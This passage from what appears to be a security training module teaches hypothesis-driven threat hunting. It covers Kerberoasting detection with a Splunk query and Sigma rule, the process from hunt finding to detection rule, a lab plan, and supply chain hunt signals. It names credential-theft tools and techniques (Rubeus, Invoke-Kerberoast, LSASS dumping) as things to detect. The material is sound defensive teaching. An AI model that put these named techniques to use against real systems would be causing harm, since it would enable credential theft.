Measuring hunting success solely by threats found creates perverse incentives and undervalues the program.

Question 5

You want to hunt for Kerberoasting attacks (T1558.003) in your environment. What data sources do you need, and what indicators would you look for?

Reveal Answer

Required data sources:

  • Domain Controller Security Logs (Event 4769 - TGS requests)
  • Optionally: EDR for tool execution (Rubeus, Invoke-Kerberoast)

Indicators to hunt for:

  1. Encryption downgrade: TGS requests with RC4 encryption (TicketEncryptionType 0x17) instead of AES—attackers prefer RC4 because it's faster to crack
  2. High volume SPN requests: Single source requesting TGS tickets for many different service accounts in short time
  3. Unusual request sources: TGS requests from workstations that don't normally interact with those services
  4. Tool artifacts: Rubeus.exe, Invoke-Kerberoast in process telemetry

Sample query (Splunk):

index=windows EventCode=4769 TicketEncryptionType=0x17
| stats dc(ServiceName) as spn_count by ClientAddress
| where spn_count > 5

Question 6

How should hunt findings be converted into improved detection capabilities? Describe the process from finding to production detection rule.

Reveal Answer

Finding to detection rule process:

  1. Document the finding:
    • Exact indicators observed
    • Query that found it
    • Context (ATT&CK technique, threat actor if known)
  2. Generalize the pattern:
    • What's the behavior vs. specific IOC?
    • How might variations appear?
    • What's the minimum viable detection?
  3. Write detection rule:
    • Use standard format (Sigma recommended)
    • Include metadata (ATT&CK mapping, severity)
    • Document false positive expectations
  4. Test in staging:
    • Run against historical data
    • Verify it catches the original finding
    • Assess false positive volume
  5. Deploy to production:
    • Start with alerting (not blocking)
    • Monitor false positive rate
    • Tune as needed
  6. Document and share:
    • Update detection catalog
    • Brief SOC on new rule
    • Consider external sharing (ISACs, community)
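Step 3 recommends the Sigma format. A minimal rule for the Kerberoasting pattern from Question 5 might look like the sketch below; the title, placeholder id, and false-positive notes are illustrative, and the field names follow Windows Security Event 4769.

```yaml
title: Possible Kerberoasting - RC4 TGS Requests
id: 00000000-0000-0000-0000-000000000000  # placeholder; generate a real UUID
status: experimental
description: Detects TGS requests using RC4 encryption, a common Kerberoasting indicator
tags:
    - attack.credential_access
    - attack.t1558.003
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4769
        TicketEncryptionType: '0x17'
    condition: selection
falsepositives:
    - Legacy services that still negotiate RC4
level: medium
```

Because Sigma is backend-agnostic, the same rule can be converted to Splunk, Elastic, or other query languages for the staging and production steps that follow.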

Lab: Threat Hunt Execution

Objective

Plan and execute a threat hunt using hypothesis-driven methodology, documenting findings and creating detection improvements.

Deliverables

Time Estimate

4-5 hours

Lab Environment Options

Lab Tasks

Part 1: Hypothesis Development (LO2)

  1. Select an ATT&CK technique to hunt (suggestions below)
  2. Research the technique—how does it work? What artifacts?
  3. Write a formal hypothesis statement
  4. Identify required data sources
  5. Plan initial queries

Suggested techniques for hunting:

  • T1059.001 - PowerShell (look for encoded commands)
  • T1053.005 - Scheduled Task (persistence)
  • T1021.002 - SMB/Windows Admin Shares (lateral movement)
  • T1003.001 - LSASS Memory (credential dumping)
  • T1071.001 - Web Protocols (C2 communication)
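For the T1059.001 suggestion, "look for encoded commands" means finding and decoding `-EncodedCommand` payloads, which PowerShell base64-encodes from UTF-16LE. A hedged Python sketch (the sample command lines and regex are assumptions for illustration):

```python
import base64
import re

# Hypothetical command lines from process telemetry (e.g., Sysmon Event 1).
cmdlines = [
    'powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA',
    'powershell.exe -File C:\\scripts\\inventory.ps1',
]

# Match -enc / -EncodedCommand and its base64 argument, case-insensitive,
# since PowerShell accepts abbreviated flags.
ENC_RE = re.compile(r'-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)

decoded_cmds = []
for line in cmdlines:
    m = ENC_RE.search(line)
    if not m:
        continue
    # PowerShell encodes the command as UTF-16LE before base64.
    decoded_cmds.append(base64.b64decode(m.group(1)).decode('utf-16-le', errors='replace'))

print(decoded_cmds)
```

Decoded payloads can then be stacked or keyword-searched (e.g., for download cradles) as part of the hunt.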

Part 2: Hunt Execution (LO3, LO4)

  1. Verify data availability in your lab environment
  2. Execute initial broad query
  3. Apply hunting techniques:
    • Stack results to find rare events
    • Cluster by relevant fields
    • Look for behavioral patterns
  4. Document each query and results
  5. Identify candidates for investigation

Part 3: Analysis and Investigation (LO4)

  1. For each candidate:
    • Gather additional context
    • Correlate across data sources
    • Determine: Expected, Suspicious, or Unknown
  2. Document findings (or document clean result)
  3. Identify false positives and their patterns

Part 4: Documentation (LO5)

  1. Complete full hunt documentation using template
  2. Include:
    • Hypothesis and rationale
    • All queries executed
    • Results and analysis
    • Finding or clean result
    • Recommendations

Part 5: Detection Engineering (LO5)

  1. Create a Sigma detection rule based on your hunt
  2. If finding: Rule to detect the specific threat
  3. If clean: Rule to monitor for the technique
  4. Include proper metadata and documentation
  5. Test rule against available data

Self-Assessment Checklist

Hypothesis Quality

  • ☐ Hypothesis is clearly stated and testable
  • ☐ Connected to specific ATT&CK technique
  • ☐ Data sources clearly identified
  • ☐ Observable evidence defined

Hunt Execution

  • ☐ Multiple hunting techniques applied
  • ☐ Queries documented with results
  • ☐ Results analyzed systematically
  • ☐ False positives identified and documented

Documentation

  • ☐ Complete hunt report using template
  • ☐ Clear conclusions (finding or clean)
  • ☐ Recommendations included
  • ☐ Professional quality

Detection Rule

  • ☐ Valid Sigma format
  • ☐ Proper ATT&CK mapping
  • ☐ False positives documented
  • ☐ Tested against data

Portfolio Integration

Save your threat hunting deliverables:

🎯 Hands-On Labs (Free & Essential)

Apply hypothesis-driven hunting before moving to reading resources.

🎮 TryHackMe: Threat Hunting

What you'll do: Build and test hunting hypotheses using real telemetry.
Why it matters: Practicing the hunt loop is the fastest way to build intuition.
Time estimate: 2-3 hours

Start TryHackMe Threat Hunting →

🧪 Splunk BOTS v3: Hunt a Realistic Dataset

What you'll do: Run hunt queries over a public dataset and document findings.
Why it matters: You learn to pivot, refine, and validate at scale.
Time estimate: 2-3 hours

Open Splunk BOTS v3 Dataset →

🛡️ SigmaHQ: Hunt-to-Detection Rule

Task: Translate one hunt finding (or hypothesis) into a Sigma rule.
Why it matters: Hunting value compounds when you ship detections.
Time estimate: 60-90 minutes

Open SigmaHQ →

🧩 Lab: Supply Chain Hunt Hypothesis

What you'll do: Build a hunt hypothesis for a poisoned update scenario.
Why it matters: Supply chain hunts require different telemetry and pivots.
Time estimate: 60-90 minutes

💡 Lab Tip: Document false positives early so you can refine hypotheses quickly.

🧩 Supply Chain Hunt Patterns

Hunting for supply chain compromise focuses on update behavior, build pipeline artifacts, and unexpected signer changes.

Supply chain hunt signals:
- New or rare update signer
- Build pipeline account anomalies
- Unexpected dependency version changes
- Update traffic to unusual domains
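The first signal above — a new or rare update signer — is itself a stacking problem. A minimal Python sketch, where the binary name, signer strings, and counts are entirely hypothetical:

```python
from collections import Counter

# Hypothetical code-signing observations from endpoint telemetry:
# (update binary name, certificate subject).
signer_events = (
    [("updater.exe", "Vendor Software Inc.")] * 950
    + [("updater.exe", "Unknown Cert LLC")] * 2  # new/rare signer for a known updater
)

signers = Counter(subject for name, subject in signer_events if name == "updater.exe")

# A signer seen on a tiny fraction of hosts is a hunt lead, not a verdict:
# verify against vendor advisories and the certificate chain before escalating.
total = sum(signers.values())
rare_signers = [s for s, n in signers.items() if n / total < 0.01]
print(rare_signers)
```

The same stack works for dependency versions and update-traffic destinations, the other signals listed above.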

📚 Building on CSY101 Week-13: Threat model update paths and trust relationships.

Resources

Required

Sqrrl Threat Hunting Reference (Archive)

Foundational threat hunting methodology from the team that pioneered modern hunting practices.

Threat Hunting Net Archive (60 minutes)

Required

Threat Hunter Playbook

Community-developed collection of hunting playbooks mapped to ATT&CK techniques with specific queries and procedures.

ThreatHunter-Playbook (GitHub) (60 minutes; review 3-4 playbooks)

Optional

SANS Threat Hunting Summit Presentations

Video presentations from threat hunting practitioners covering real-world techniques and case studies.

SANS Introduction to Threat Hunting (45 minutes)

Optional

MITRE Cyber Analytics Repository (CAR)

Detection analytics that can inform hunting—includes pseudocode and specific implementations.

MITRE CAR (30 minutes)

Weekly Reflection

Prompt

Reflect on the relationship between threat hunting and automated detection. How does hunting complement (rather than replace) traditional security monitoring? What skills and mindset does effective hunting require beyond technical query abilities?

Consider: How would you justify a threat hunting program to leadership if hunts often come back "clean" with no findings? What value does hunting provide beyond finding active threats?

Target length: 250-350 words